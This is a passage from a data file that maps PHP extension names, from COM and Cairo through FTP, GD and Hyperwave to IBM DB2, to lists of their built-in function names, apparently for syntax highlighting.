'COM': ['com_addref', 'com_create_guid', 'com_event_sink', 'com_get_active_object', 'com_get', 'com_invoke', 'com_isenum', 'com_load_typelib', 'com_load', 'com_message_pump', 'com_print_typeinfo', 'com_propget', 'com_propput', 'com_propset', 'com_release', 'com_set', 'variant_abs', 'variant_add', 'variant_and', 'variant_cast', 'variant_cat', 'variant_cmp', 'variant_date_from_timestamp', 'variant_date_to_timestamp', 'variant_div', 'variant_eqv', 'variant_fix', 'variant_get_type', 'variant_idiv', 'variant_imp', 'variant_int', 'variant_mod', 'variant_mul', 'variant_neg', 'variant_not', 'variant_or', 'variant_pow', 'variant_round', 'variant_set_type', 'variant_set', 'variant_sub', 'variant_xor'], 'CUBRID': ['cubrid_bind', 'cubrid_close_prepare', 'cubrid_close_request', 'cubrid_col_get', 'cubrid_col_size', 'cubrid_column_names', 'cubrid_column_types', 'cubrid_commit', 'cubrid_connect_with_url', 'cubrid_connect', 'cubrid_current_oid', 'cubrid_disconnect', 'cubrid_drop', 'cubrid_error_code_facility', 'cubrid_error_code', 'cubrid_error_msg', 'cubrid_execute', 'cubrid_fetch', 'cubrid_free_result', 'cubrid_get_autocommit', 'cubrid_get_charset', 'cubrid_get_class_name', 'cubrid_get_client_info', 'cubrid_get_db_parameter', 'cubrid_get_query_timeout', 'cubrid_get_server_info', 'cubrid_get', 'cubrid_insert_id', 'cubrid_is_instance', 'cubrid_lob_close', 'cubrid_lob_export', 'cubrid_lob_get', 'cubrid_lob_send', 'cubrid_lob_size', 'cubrid_lob2_bind', 'cubrid_lob2_close', 'cubrid_lob2_export', 'cubrid_lob2_import', 'cubrid_lob2_new', 'cubrid_lob2_read', 'cubrid_lob2_seek64', 'cubrid_lob2_seek', 'cubrid_lob2_size64', 'cubrid_lob2_size', 'cubrid_lob2_tell64', 'cubrid_lob2_tell', 'cubrid_lob2_write', 'cubrid_lock_read', 'cubrid_lock_write', 'cubrid_move_cursor', 'cubrid_next_result', 'cubrid_num_cols', 'cubrid_num_rows', 'cubrid_pconnect_with_url', 'cubrid_pconnect', 'cubrid_prepare', 'cubrid_put', 'cubrid_rollback', 'cubrid_schema', 'cubrid_seq_drop', 'cubrid_seq_insert', 'cubrid_seq_put', 'cubrid_set_add', 'cubrid_set_autocommit', 'cubrid_set_db_parameter', 'cubrid_set_drop', 'cubrid_set_query_timeout', 'cubrid_version'], 'Cairo': ['cairo_create', 'cairo_font_face_get_type', 'cairo_font_face_status', 'cairo_font_options_create', 'cairo_font_options_equal', 'cairo_font_options_get_antialias', 'cairo_font_options_get_hint_metrics', 'cairo_font_options_get_hint_style', 'cairo_font_options_get_subpixel_order', 'cairo_font_options_hash', 'cairo_font_options_merge', 'cairo_font_options_set_antialias', 'cairo_font_options_set_hint_metrics', 'cairo_font_options_set_hint_style', 'cairo_font_options_set_subpixel_order', 'cairo_font_options_status', 'cairo_format_stride_for_width', 'cairo_image_surface_create_for_data', 'cairo_image_surface_create_from_png', 'cairo_image_surface_create', 'cairo_image_surface_get_data', 'cairo_image_surface_get_format', 'cairo_image_surface_get_height', 'cairo_image_surface_get_stride', 'cairo_image_surface_get_width', 'cairo_matrix_create_scale', 'cairo_matrix_create_translate', 'cairo_matrix_invert', 'cairo_matrix_multiply', 'cairo_matrix_rotate', 'cairo_matrix_transform_distance', 'cairo_matrix_transform_point', 'cairo_matrix_translate', 'cairo_pattern_add_color_stop_rgb', 'cairo_pattern_add_color_stop_rgba', 'cairo_pattern_create_for_surface', 'cairo_pattern_create_linear', 'cairo_pattern_create_radial', 'cairo_pattern_create_rgb', 'cairo_pattern_create_rgba', 'cairo_pattern_get_color_stop_count', 'cairo_pattern_get_color_stop_rgba', 'cairo_pattern_get_extend', 
'cairo_pattern_get_filter', 'cairo_pattern_get_linear_points', 'cairo_pattern_get_matrix', 'cairo_pattern_get_radial_circles', 'cairo_pattern_get_rgba', 'cairo_pattern_get_surface', 'cairo_pattern_get_type', 'cairo_pattern_set_extend', 'cairo_pattern_set_filter', 'cairo_pattern_set_matrix', 'cairo_pattern_status', 'cairo_pdf_surface_create', 'cairo_pdf_surface_set_size', 'cairo_ps_get_levels', 'cairo_ps_level_to_string', 'cairo_ps_surface_create', 'cairo_ps_surface_dsc_begin_page_setup', 'cairo_ps_surface_dsc_begin_setup', 'cairo_ps_surface_dsc_comment', 'cairo_ps_surface_get_eps', 'cairo_ps_surface_restrict_to_level', 'cairo_ps_surface_set_eps', 'cairo_ps_surface_set_size', 'cairo_scaled_font_create', 'cairo_scaled_font_extents', 'cairo_scaled_font_get_ctm', 'cairo_scaled_font_get_font_face', 'cairo_scaled_font_get_font_matrix', 'cairo_scaled_font_get_font_options', 'cairo_scaled_font_get_scale_matrix', 'cairo_scaled_font_get_type', 'cairo_scaled_font_glyph_extents', 'cairo_scaled_font_status', 'cairo_scaled_font_text_extents', 'cairo_surface_copy_page', 'cairo_surface_create_similar', 'cairo_surface_finish', 'cairo_surface_flush', 'cairo_surface_get_content', 'cairo_surface_get_device_offset', 'cairo_surface_get_font_options', 'cairo_surface_get_type', 'cairo_surface_mark_dirty_rectangle', 'cairo_surface_mark_dirty', 'cairo_surface_set_device_offset', 'cairo_surface_set_fallback_resolution', 'cairo_surface_show_page', 'cairo_surface_status', 'cairo_surface_write_to_png', 'cairo_svg_surface_create', 'cairo_svg_surface_restrict_to_version', 'cairo_svg_version_to_string'], 'Calendar': ['cal_days_in_month', 'cal_from_jd', 'cal_info', 'cal_to_jd', 'easter_date', 'easter_days', 'FrenchToJD', 'GregorianToJD', 'JDDayOfWeek', 'JDMonthName', 'JDToFrench', 'JDToGregorian', 'jdtojewish', 'JDToJulian', 'jdtounix', 'JewishToJD', 'JulianToJD', 'unixtojd'], 'Classes/Object': ['__autoload', 'call_user_method_array', 'call_user_method', 'class_alias', 'class_exists', 'get_called_class', 'get_class_methods', 'get_class_vars', 'get_class', 'get_declared_classes', 'get_declared_interfaces', 'get_declared_traits', 'get_object_vars', 'get_parent_class', 'interface_exists', 'is_a', 'is_subclass_of', 'method_exists', 'property_exists', 'trait_exists'], 'Classkit': ['classkit_import', 'classkit_method_add', 'classkit_method_copy', 'classkit_method_redefine', 'classkit_method_remove', 'classkit_method_rename'], 'Crack': ['crack_check', 'crack_closedict', 'crack_getlastmessage', 'crack_opendict'], 'Ctype': ['ctype_alnum', 'ctype_alpha', 'ctype_cntrl', 'ctype_digit', 'ctype_graph', 'ctype_lower', 'ctype_print', 'ctype_punct', 'ctype_space', 'ctype_upper', 'ctype_xdigit'], 'Cyrus': ['cyrus_authenticate', 'cyrus_bind', 'cyrus_close', 'cyrus_connect', 'cyrus_query', 'cyrus_unbind'], 'DB++': ['dbplus_add', 'dbplus_aql', 'dbplus_chdir', 'dbplus_close', 'dbplus_curr', 'dbplus_errcode', 'dbplus_errno', 'dbplus_find', 'dbplus_first', 'dbplus_flush', 'dbplus_freealllocks', 'dbplus_freelock', 'dbplus_freerlocks', 'dbplus_getlock', 'dbplus_getunique', 'dbplus_info', 'dbplus_last', 'dbplus_lockrel', 'dbplus_next', 'dbplus_open', 'dbplus_prev', 'dbplus_rchperm', 'dbplus_rcreate', 'dbplus_rcrtexact', 'dbplus_rcrtlike', 'dbplus_resolve', 'dbplus_restorepos', 'dbplus_rkeys', 'dbplus_ropen', 'dbplus_rquery', 'dbplus_rrename', 'dbplus_rsecindex', 'dbplus_runlink', 'dbplus_rzap', 'dbplus_savepos', 'dbplus_setindex', 'dbplus_setindexbynumber', 'dbplus_sql', 'dbplus_tcl', 'dbplus_tremove', 'dbplus_undo', 'dbplus_undoprepare', 
'dbplus_unlockrel', 'dbplus_unselect', 'dbplus_update', 'dbplus_xlockrel', 'dbplus_xunlockrel'], 'DBA': ['dba_close', 'dba_delete', 'dba_exists', 'dba_fetch', 'dba_firstkey', 'dba_handlers', 'dba_insert', 'dba_key_split', 'dba_list', 'dba_nextkey', 'dba_open', 'dba_optimize', 'dba_popen', 'dba_replace', 'dba_sync'], 'DOM': ['dom_import_simplexml'], 'Date/Time': ['checkdate', 'date_add', 'date_create_from_format', 'date_create_immutable_from_format', 'date_create_immutable', 'date_create', 'date_date_set', 'date_default_timezone_get', 'date_default_timezone_set', 'date_diff', 'date_format', 'date_get_last_errors', 'date_interval_create_from_date_string', 'date_interval_format', 'date_isodate_set', 'date_modify', 'date_offset_get', 'date_parse_from_format', 'date_parse', 'date_sub', 'date_sun_info', 'date_sunrise', 'date_sunset', 'date_time_set', 'date_timestamp_get', 'date_timestamp_set', 'date_timezone_get', 'date_timezone_set', 'date', 'getdate', 'gettimeofday', 'gmdate', 'gmmktime', 'gmstrftime', 'idate', 'localtime', 'microtime', 'mktime', 'strftime', 'strptime', 'strtotime', 'time', 'timezone_abbreviations_list', 'timezone_identifiers_list', 'timezone_location_get', 'timezone_name_from_abbr', 'timezone_name_get', 'timezone_offset_get', 'timezone_open', 'timezone_transitions_get', 'timezone_version_get'], 'Direct IO': ['dio_close', 'dio_fcntl', 'dio_open', 'dio_read', 'dio_seek', 'dio_stat', 'dio_tcsetattr', 'dio_truncate', 'dio_write'], 'Directory': ['chdir', 'chroot', 'closedir', 'dir', 'getcwd', 'opendir', 'readdir', 'rewinddir', 'scandir'], 'Eio': ['eio_busy', 'eio_cancel', 'eio_chmod', 'eio_chown', 'eio_close', 'eio_custom', 'eio_dup2', 'eio_event_loop', 'eio_fallocate', 'eio_fchmod', 'eio_fchown', 'eio_fdatasync', 'eio_fstat', 'eio_fstatvfs', 'eio_fsync', 'eio_ftruncate', 'eio_futime', 'eio_get_event_stream', 'eio_get_last_error', 'eio_grp_add', 'eio_grp_cancel', 'eio_grp_limit', 'eio_grp', 'eio_init', 'eio_link', 'eio_lstat', 'eio_mkdir', 'eio_mknod', 'eio_nop', 'eio_npending', 'eio_nready', 'eio_nreqs', 'eio_nthreads', 'eio_open', 'eio_poll', 'eio_read', 'eio_readahead', 'eio_readdir', 'eio_readlink', 'eio_realpath', 'eio_rename', 'eio_rmdir', 'eio_seek', 'eio_sendfile', 'eio_set_max_idle', 'eio_set_max_parallel', 'eio_set_max_poll_reqs', 'eio_set_max_poll_time', 'eio_set_min_parallel', 'eio_stat', 'eio_statvfs', 'eio_symlink', 'eio_sync_file_range', 'eio_sync', 'eio_syncfs', 'eio_truncate', 'eio_unlink', 'eio_utime', 'eio_write'], 'Enchant': ['enchant_broker_describe', 'enchant_broker_dict_exists', 'enchant_broker_free_dict', 'enchant_broker_free', 'enchant_broker_get_error', 'enchant_broker_init', 'enchant_broker_list_dicts', 'enchant_broker_request_dict', 'enchant_broker_request_pwl_dict', 'enchant_broker_set_ordering', 'enchant_dict_add_to_personal', 'enchant_dict_add_to_session', 'enchant_dict_check', 'enchant_dict_describe', 'enchant_dict_get_error', 'enchant_dict_is_in_session', 'enchant_dict_quick_check', 'enchant_dict_store_replacement', 'enchant_dict_suggest'], 'Error Handling': ['debug_backtrace', 'debug_print_backtrace', 'error_get_last', 'error_log', 'error_reporting', 'restore_error_handler', 'restore_exception_handler', 'set_error_handler', 'set_exception_handler', 'trigger_error', 'user_error'], 'Exif': ['exif_imagetype', 'exif_read_data', 'exif_tagname', 'exif_thumbnail', 'read_exif_data'], 'Expect': ['expect_expectl', 'expect_popen'], 'FAM': ['fam_cancel_monitor', 'fam_close', 'fam_monitor_collection', 'fam_monitor_directory', 'fam_monitor_file', 
'fam_next_event', 'fam_open', 'fam_pending', 'fam_resume_monitor', 'fam_suspend_monitor'], 'FDF': ['fdf_add_doc_javascript', 'fdf_add_template', 'fdf_close', 'fdf_create', 'fdf_enum_values', 'fdf_errno', 'fdf_error', 'fdf_get_ap', 'fdf_get_attachment', 'fdf_get_encoding', 'fdf_get_file', 'fdf_get_flags', 'fdf_get_opt', 'fdf_get_status', 'fdf_get_value', 'fdf_get_version', 'fdf_header', 'fdf_next_field_name', 'fdf_open_string', 'fdf_open', 'fdf_remove_item', 'fdf_save_string', 'fdf_save', 'fdf_set_ap', 'fdf_set_encoding', 'fdf_set_file', 'fdf_set_flags', 'fdf_set_javascript_action', 'fdf_set_on_import_javascript', 'fdf_set_opt', 'fdf_set_status', 'fdf_set_submit_form_action', 'fdf_set_target_frame', 'fdf_set_value', 'fdf_set_version'], 'FPM': ['fastcgi_finish_request'], 'FTP': ['ftp_alloc', 'ftp_cdup', 'ftp_chdir', 'ftp_chmod', 'ftp_close', 'ftp_connect', 'ftp_delete', 'ftp_exec', 'ftp_fget', 'ftp_fput', 'ftp_get_option', 'ftp_get', 'ftp_login', 'ftp_mdtm', 'ftp_mkdir', 'ftp_nb_continue', 'ftp_nb_fget', 'ftp_nb_fput', 'ftp_nb_get', 'ftp_nb_put', 'ftp_nlist', 'ftp_pasv', 'ftp_put', 'ftp_pwd', 'ftp_quit', 'ftp_raw', 'ftp_rawlist', 'ftp_rename', 'ftp_rmdir', 'ftp_set_option', 'ftp_site', 'ftp_size', 'ftp_ssl_connect', 'ftp_systype'], 'Fann': ['fann_cascadetrain_on_data', 'fann_cascadetrain_on_file', 'fann_clear_scaling_params', 'fann_copy', 'fann_create_from_file', 'fann_create_shortcut_array', 'fann_create_shortcut', 'fann_create_sparse_array', 'fann_create_sparse', 'fann_create_standard_array', 'fann_create_standard', 'fann_create_train_from_callback', 'fann_create_train', 'fann_descale_input', 'fann_descale_output', 'fann_descale_train', 'fann_destroy_train', 'fann_destroy', 'fann_duplicate_train_data', 'fann_get_activation_function', 'fann_get_activation_steepness', 'fann_get_bias_array', 'fann_get_bit_fail_limit', 'fann_get_bit_fail', 'fann_get_cascade_activation_functions_count', 'fann_get_cascade_activation_functions', 'fann_get_cascade_activation_steepnesses_count', 'fann_get_cascade_activation_steepnesses', 'fann_get_cascade_candidate_change_fraction', 'fann_get_cascade_candidate_limit', 'fann_get_cascade_candidate_stagnation_epochs', 'fann_get_cascade_max_cand_epochs', 'fann_get_cascade_max_out_epochs', 'fann_get_cascade_min_cand_epochs', 'fann_get_cascade_min_out_epochs', 'fann_get_cascade_num_candidate_groups', 'fann_get_cascade_num_candidates', 'fann_get_cascade_output_change_fraction', 'fann_get_cascade_output_stagnation_epochs', 'fann_get_cascade_weight_multiplier', 'fann_get_connection_array', 'fann_get_connection_rate', 'fann_get_errno', 'fann_get_errstr', 'fann_get_layer_array', 'fann_get_learning_momentum', 'fann_get_learning_rate', 'fann_get_MSE', 'fann_get_network_type', 'fann_get_num_input', 'fann_get_num_layers', 'fann_get_num_output', 'fann_get_quickprop_decay', 'fann_get_quickprop_mu', 'fann_get_rprop_decrease_factor', 'fann_get_rprop_delta_max', 'fann_get_rprop_delta_min', 'fann_get_rprop_delta_zero', 'fann_get_rprop_increase_factor', 'fann_get_sarprop_step_error_shift', 'fann_get_sarprop_step_error_threshold_factor', 'fann_get_sarprop_temperature', 'fann_get_sarprop_weight_decay_shift', 'fann_get_total_connections', 'fann_get_total_neurons', 'fann_get_train_error_function', 'fann_get_train_stop_function', 'fann_get_training_algorithm', 'fann_init_weights', 'fann_length_train_data', 'fann_merge_train_data', 'fann_num_input_train_data', 'fann_num_output_train_data', 'fann_print_error', 'fann_randomize_weights', 'fann_read_train_from_file', 'fann_reset_errno', 
'fann_reset_errstr', 'fann_reset_MSE', 'fann_run', 'fann_save_train', 'fann_save', 'fann_scale_input_train_data', 'fann_scale_input', 'fann_scale_output_train_data', 'fann_scale_output', 'fann_scale_train_data', 'fann_scale_train', 'fann_set_activation_function_hidden', 'fann_set_activation_function_layer', 'fann_set_activation_function_output', 'fann_set_activation_function', 'fann_set_activation_steepness_hidden', 'fann_set_activation_steepness_layer', 'fann_set_activation_steepness_output', 'fann_set_activation_steepness', 'fann_set_bit_fail_limit', 'fann_set_callback', 'fann_set_cascade_activation_functions', 'fann_set_cascade_activation_steepnesses', 'fann_set_cascade_candidate_change_fraction', 'fann_set_cascade_candidate_limit', 'fann_set_cascade_candidate_stagnation_epochs', 'fann_set_cascade_max_cand_epochs', 'fann_set_cascade_max_out_epochs', 'fann_set_cascade_min_cand_epochs', 'fann_set_cascade_min_out_epochs', 'fann_set_cascade_num_candidate_groups', 'fann_set_cascade_output_change_fraction', 'fann_set_cascade_output_stagnation_epochs', 'fann_set_cascade_weight_multiplier', 'fann_set_error_log', 'fann_set_input_scaling_params', 'fann_set_learning_momentum', 'fann_set_learning_rate', 'fann_set_output_scaling_params', 'fann_set_quickprop_decay', 'fann_set_quickprop_mu', 'fann_set_rprop_decrease_factor', 'fann_set_rprop_delta_max', 'fann_set_rprop_delta_min', 'fann_set_rprop_delta_zero', 'fann_set_rprop_increase_factor', 'fann_set_sarprop_step_error_shift', 'fann_set_sarprop_step_error_threshold_factor', 'fann_set_sarprop_temperature', 'fann_set_sarprop_weight_decay_shift', 'fann_set_scaling_params', 'fann_set_train_error_function', 'fann_set_train_stop_function', 'fann_set_training_algorithm', 'fann_set_weight_array', 'fann_set_weight', 'fann_shuffle_train_data', 'fann_subset_train_data', 'fann_test_data', 'fann_test', 'fann_train_epoch', 'fann_train_on_data', 'fann_train_on_file', 'fann_train'], 'Fileinfo': ['finfo_buffer', 'finfo_close', 'finfo_file', 'finfo_open', 'finfo_set_flags', 'mime_content_type'], 'Filesystem': ['basename', 'chgrp', 'chmod', 'chown', 'clearstatcache', 'copy', 'dirname', 'disk_free_space', 'disk_total_space', 'diskfreespace', 'fclose', 'feof', 'fflush', 'fgetc', 'fgetcsv', 'fgets', 'fgetss', 'file_exists', 'file_get_contents', 'file_put_contents', 'file', 'fileatime', 'filectime', 'filegroup', 'fileinode', 'filemtime', 'fileowner', 'fileperms', 'filesize', 'filetype', 'flock', 'fnmatch', 'fopen', 'fpassthru', 'fputcsv', 'fputs', 'fread', 'fscanf', 'fseek', 'fstat', 'ftell', 'ftruncate', 'fwrite', 'glob', 'is_dir', 'is_executable', 'is_file', 'is_link', 'is_readable', 'is_uploaded_file', 'is_writable', 'is_writeable', 'lchgrp', 'lchown', 'link', 'linkinfo', 'lstat', 'mkdir', 'move_uploaded_file', 'parse_ini_file', 'parse_ini_string', 'pathinfo', 'pclose', 'popen', 'readfile', 'readlink', 'realpath_cache_get', 'realpath_cache_size', 'realpath', 'rename', 'rewind', 'rmdir', 'set_file_buffer', 'stat', 'symlink', 'tempnam', 'tmpfile', 'touch', 'umask', 'unlink'], 'Filter': ['filter_has_var', 'filter_id', 'filter_input_array', 'filter_input', 'filter_list', 'filter_var_array', 'filter_var'], 'Firebird/InterBase': ['ibase_add_user', 'ibase_affected_rows', 'ibase_backup', 'ibase_blob_add', 'ibase_blob_cancel', 'ibase_blob_close', 'ibase_blob_create', 'ibase_blob_echo', 'ibase_blob_get', 'ibase_blob_import', 'ibase_blob_info', 'ibase_blob_open', 'ibase_close', 'ibase_commit_ret', 'ibase_commit', 'ibase_connect', 'ibase_db_info', 'ibase_delete_user', 
'ibase_drop_db', 'ibase_errcode', 'ibase_errmsg', 'ibase_execute', 'ibase_fetch_assoc', 'ibase_fetch_object', 'ibase_fetch_row', 'ibase_field_info', 'ibase_free_event_handler', 'ibase_free_query', 'ibase_free_result', 'ibase_gen_id', 'ibase_maintain_db', 'ibase_modify_user', 'ibase_name_result', 'ibase_num_fields', 'ibase_num_params', 'ibase_param_info', 'ibase_pconnect', 'ibase_prepare', 'ibase_query', 'ibase_restore', 'ibase_rollback_ret', 'ibase_rollback', 'ibase_server_info', 'ibase_service_attach', 'ibase_service_detach', 'ibase_set_event_handler', 'ibase_trans', 'ibase_wait_event'], 'FriBiDi': ['fribidi_log2vis'], 'FrontBase': ['fbsql_affected_rows', 'fbsql_autocommit', 'fbsql_blob_size', 'fbsql_change_user', 'fbsql_clob_size', 'fbsql_close', 'fbsql_commit', 'fbsql_connect', 'fbsql_create_blob', 'fbsql_create_clob', 'fbsql_create_db', 'fbsql_data_seek', 'fbsql_database_password', 'fbsql_database', 'fbsql_db_query', 'fbsql_db_status', 'fbsql_drop_db', 'fbsql_errno', 'fbsql_error', 'fbsql_fetch_array', 'fbsql_fetch_assoc', 'fbsql_fetch_field', 'fbsql_fetch_lengths', 'fbsql_fetch_object', 'fbsql_fetch_row', 'fbsql_field_flags', 'fbsql_field_len', 'fbsql_field_name', 'fbsql_field_seek', 'fbsql_field_table', 'fbsql_field_type', 'fbsql_free_result', 'fbsql_get_autostart_info', 'fbsql_hostname', 'fbsql_insert_id', 'fbsql_list_dbs', 'fbsql_list_fields', 'fbsql_list_tables', 'fbsql_next_result', 'fbsql_num_fields', 'fbsql_num_rows', 'fbsql_password', 'fbsql_pconnect', 'fbsql_query', 'fbsql_read_blob', 'fbsql_read_clob', 'fbsql_result', 'fbsql_rollback', 'fbsql_rows_fetched', 'fbsql_select_db', 'fbsql_set_characterset', 'fbsql_set_lob_mode', 'fbsql_set_password', 'fbsql_set_transaction', 'fbsql_start_db', 'fbsql_stop_db', 'fbsql_table_name', 'fbsql_tablename', 'fbsql_username', 'fbsql_warnings'], 'Function handling': ['call_user_func_array', 'call_user_func', 'create_function', 'forward_static_call_array', 'forward_static_call', 'func_get_arg', 'func_get_args', 'func_num_args', 'function_exists', 'get_defined_functions', 'register_shutdown_function', 'register_tick_function', 'unregister_tick_function'], 'GD and Image': ['gd_info', 'getimagesize', 'getimagesizefromstring', 'image_type_to_extension', 'image_type_to_mime_type', 'image2wbmp', 'imageaffine', 'imageaffinematrixconcat', 'imageaffinematrixget', 'imagealphablending', 'imageantialias', 'imagearc', 'imagechar', 'imagecharup', 'imagecolorallocate', 'imagecolorallocatealpha', 'imagecolorat', 'imagecolorclosest', 'imagecolorclosestalpha', 'imagecolorclosesthwb', 'imagecolordeallocate', 'imagecolorexact', 'imagecolorexactalpha', 'imagecolormatch', 'imagecolorresolve', 'imagecolorresolvealpha', 'imagecolorset', 'imagecolorsforindex', 'imagecolorstotal', 'imagecolortransparent', 'imageconvolution', 'imagecopy', 'imagecopymerge', 'imagecopymergegray', 'imagecopyresampled', 'imagecopyresized', 'imagecreate', 'imagecreatefromgd2', 'imagecreatefromgd2part', 'imagecreatefromgd', 'imagecreatefromgif', 'imagecreatefromjpeg', 'imagecreatefrompng', 'imagecreatefromstring', 'imagecreatefromwbmp', 'imagecreatefromwebp', 'imagecreatefromxbm', 'imagecreatefromxpm', 'imagecreatetruecolor', 'imagecrop', 'imagecropauto', 'imagedashedline', 'imagedestroy', 'imageellipse', 'imagefill', 'imagefilledarc', 'imagefilledellipse', 'imagefilledpolygon', 'imagefilledrectangle', 'imagefilltoborder', 'imagefilter', 'imageflip', 'imagefontheight', 'imagefontwidth', 'imageftbbox', 'imagefttext', 'imagegammacorrect', 'imagegd2', 'imagegd', 'imagegif', 'imagegrabscreen', 
'imagegrabwindow', 'imageinterlace', 'imageistruecolor', 'imagejpeg', 'imagelayereffect', 'imageline', 'imageloadfont', 'imagepalettecopy', 'imagepalettetotruecolor', 'imagepng', 'imagepolygon', 'imagepsbbox', 'imagepsencodefont', 'imagepsextendfont', 'imagepsfreefont', 'imagepsloadfont', 'imagepsslantfont', 'imagepstext', 'imagerectangle', 'imagerotate', 'imagesavealpha', 'imagescale', 'imagesetbrush', 'imagesetinterpolation', 'imagesetpixel', 'imagesetstyle', 'imagesetthickness', 'imagesettile', 'imagestring', 'imagestringup', 'imagesx', 'imagesy', 'imagetruecolortopalette', 'imagettfbbox', 'imagettftext', 'imagetypes', 'imagewbmp', 'imagewebp', 'imagexbm', 'iptcembed', 'iptcparse', 'jpeg2wbmp', 'png2wbmp'], 'GMP': ['gmp_abs', 'gmp_add', 'gmp_and', 'gmp_clrbit', 'gmp_cmp', 'gmp_com', 'gmp_div_q', 'gmp_div_qr', 'gmp_div_r', 'gmp_div', 'gmp_divexact', 'gmp_fact', 'gmp_gcd', 'gmp_gcdext', 'gmp_hamdist', 'gmp_init', 'gmp_intval', 'gmp_invert', 'gmp_jacobi', 'gmp_legendre', 'gmp_mod', 'gmp_mul', 'gmp_neg', 'gmp_nextprime', 'gmp_or', 'gmp_perfect_square', 'gmp_popcount', 'gmp_pow', 'gmp_powm', 'gmp_prob_prime', 'gmp_random', 'gmp_scan0', 'gmp_scan1', 'gmp_setbit', 'gmp_sign', 'gmp_sqrt', 'gmp_sqrtrem', 'gmp_strval', 'gmp_sub', 'gmp_testbit', 'gmp_xor'], 'GeoIP': ['geoip_asnum_by_name', 'geoip_continent_code_by_name', 'geoip_country_code_by_name', 'geoip_country_code3_by_name', 'geoip_country_name_by_name', 'geoip_database_info', 'geoip_db_avail', 'geoip_db_filename', 'geoip_db_get_all_info', 'geoip_domain_by_name', 'geoip_id_by_name', 'geoip_isp_by_name', 'geoip_netspeedcell_by_name', 'geoip_org_by_name', 'geoip_record_by_name', 'geoip_region_by_name', 'geoip_region_name_by_code', 'geoip_setup_custom_directory', 'geoip_time_zone_by_country_and_region'], 'Gettext': ['bind_textdomain_codeset', 'bindtextdomain', 'dcgettext', 'dcngettext', 'dgettext', 'dngettext', 'gettext', 'ngettext', 'textdomain'], 'GnuPG': ['gnupg_adddecryptkey', 'gnupg_addencryptkey', 'gnupg_addsignkey', 'gnupg_cleardecryptkeys', 'gnupg_clearencryptkeys', 'gnupg_clearsignkeys', 'gnupg_decrypt', 'gnupg_decryptverify', 'gnupg_encrypt', 'gnupg_encryptsign', 'gnupg_export', 'gnupg_geterror', 'gnupg_getprotocol', 'gnupg_import', 'gnupg_init', 'gnupg_keyinfo', 'gnupg_setarmor', 'gnupg_seterrormode', 'gnupg_setsignmode', 'gnupg_sign', 'gnupg_verify'], 'Gopher': ['gopher_parsedir'], 'Grapheme': ['grapheme_extract', 'grapheme_stripos', 'grapheme_stristr', 'grapheme_strlen', 'grapheme_strpos', 'grapheme_strripos', 'grapheme_strrpos', 'grapheme_strstr', 'grapheme_substr'], 'Gupnp': ['gupnp_context_get_host_ip', 'gupnp_context_get_port', 'gupnp_context_get_subscription_timeout', 'gupnp_context_host_path', 'gupnp_context_new', 'gupnp_context_set_subscription_timeout', 'gupnp_context_timeout_add', 'gupnp_context_unhost_path', 'gupnp_control_point_browse_start', 'gupnp_control_point_browse_stop', 'gupnp_control_point_callback_set', 'gupnp_control_point_new', 'gupnp_device_action_callback_set', 'gupnp_device_info_get_service', 'gupnp_device_info_get', 'gupnp_root_device_get_available', 'gupnp_root_device_get_relative_location', 'gupnp_root_device_new', 'gupnp_root_device_set_available', 'gupnp_root_device_start', 'gupnp_root_device_stop', 'gupnp_service_action_get', 'gupnp_service_action_return_error', 'gupnp_service_action_return', 'gupnp_service_action_set', 'gupnp_service_freeze_notify', 'gupnp_service_info_get_introspection', 'gupnp_service_info_get', 'gupnp_service_introspection_get_state_variable', 'gupnp_service_notify', 
'gupnp_service_proxy_action_get', 'gupnp_service_proxy_action_set', 'gupnp_service_proxy_add_notify', 'gupnp_service_proxy_callback_set', 'gupnp_service_proxy_get_subscribed', 'gupnp_service_proxy_remove_notify', 'gupnp_service_proxy_set_subscribed', 'gupnp_service_thaw_notify'], 'HTTP': ['http_cache_etag', 'http_cache_last_modified', 'http_chunked_decode', 'http_deflate', 'http_inflate', 'http_build_cookie', 'http_date', 'http_get_request_body_stream', 'http_get_request_body', 'http_get_request_headers', 'http_match_etag', 'http_match_modified', 'http_match_request_header', 'http_support', 'http_negotiate_charset', 'http_negotiate_content_type', 'http_negotiate_language', 'ob_deflatehandler', 'ob_etaghandler', 'ob_inflatehandler', 'http_parse_cookie', 'http_parse_headers', 'http_parse_message', 'http_parse_params', 'http_persistent_handles_clean', 'http_persistent_handles_count', 'http_persistent_handles_ident', 'http_get', 'http_head', 'http_post_data', 'http_post_fields', 'http_put_data', 'http_put_file', 'http_put_stream', 'http_request_body_encode', 'http_request_method_exists', 'http_request_method_name', 'http_request_method_register', 'http_request_method_unregister', 'http_request', 'http_redirect', 'http_send_content_disposition', 'http_send_content_type', 'http_send_data', 'http_send_file', 'http_send_last_modified', 'http_send_status', 'http_send_stream', 'http_throttle', 'http_build_str', 'http_build_url'], 'Hash': ['hash_algos', 'hash_copy', 'hash_file', 'hash_final', 'hash_hmac_file', 'hash_hmac', 'hash_init', 'hash_pbkdf2', 'hash_update_file', 'hash_update_stream', 'hash_update', 'hash'], 'Hyperwave': ['hw_Array2Objrec', 'hw_changeobject', 'hw_Children', 'hw_ChildrenObj', 'hw_Close', 'hw_Connect', 'hw_connection_info', 'hw_cp', 'hw_Deleteobject', 'hw_DocByAnchor', 'hw_DocByAnchorObj', 'hw_Document_Attributes', 'hw_Document_BodyTag', 'hw_Document_Content', 'hw_Document_SetContent', 'hw_Document_Size', 'hw_dummy', 'hw_EditText', 'hw_Error', 'hw_ErrorMsg', 'hw_Free_Document', 'hw_GetAnchors', 'hw_GetAnchorsObj', 'hw_GetAndLock', 'hw_GetChildColl', 'hw_GetChildCollObj', 'hw_GetChildDocColl', 'hw_GetChildDocCollObj', 'hw_GetObject', 'hw_GetObjectByQuery', 'hw_GetObjectByQueryColl', 'hw_GetObjectByQueryCollObj', 'hw_GetObjectByQueryObj', 'hw_GetParents', 'hw_GetParentsObj', 'hw_getrellink', 'hw_GetRemote', 'hw_getremotechildren', 'hw_GetSrcByDestObj', 'hw_GetText', 'hw_getusername', 'hw_Identify', 'hw_InCollections', 'hw_Info', 'hw_InsColl', 'hw_InsDoc', 'hw_insertanchors', 'hw_InsertDocument', 'hw_InsertObject', 'hw_mapid', 'hw_Modifyobject', 'hw_mv', 'hw_New_Document', 'hw_objrec2array', 'hw_Output_Document', 'hw_pConnect', 'hw_PipeDocument', 'hw_Root', 'hw_setlinkroot', 'hw_stat', 'hw_Unlock', 'hw_Who'], 'Hyperwave API': ['hwapi_attribute_new', 'hwapi_content_new', 'hwapi_hgcsp', 'hwapi_object_new'], 'IBM DB2': ['db2_autocommit', 'db2_bind_param', 'db2_client_info', 'db2_close', 'db2_column_privileges', 